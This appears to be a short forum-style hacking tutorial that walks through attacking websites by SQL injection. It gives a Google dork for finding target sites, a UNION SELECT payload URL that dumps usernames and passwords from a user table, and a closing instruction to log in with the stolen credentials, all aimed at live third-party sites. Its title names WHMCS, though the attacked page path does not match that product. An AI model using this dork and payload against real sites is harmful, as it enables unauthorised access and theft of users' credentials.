Title: WHMCS SQL Injection Vulnerablity Author: MaX-HaCker
WHMCS SQL Injection Vulnerability. This is a very old vulnerability but still works.Lets Start
Firstly find a vulnerable site by using Google Dork
inurl:"weblink_cat_list.php?bcat_id=" URL will be something like thishttp://www.example.com/oldweb_kroobannok/weblink_cat_list.php?bcat_id=1 Then change the url fromhttp://www.example.com/oldweb_kroobannok/weblink_cat_list.php?bcat_id=1 tohttp://www.example.com/oldweb_kroobannok/weblink_cat_list.php?bcat_id=-1+UNION+SELECT+1,GROUP_concat(id,0x3a,username,0x3a,password), 3,4+from+user
Bang ! All username as well as passwords will be shown. Now login with that credentials.
|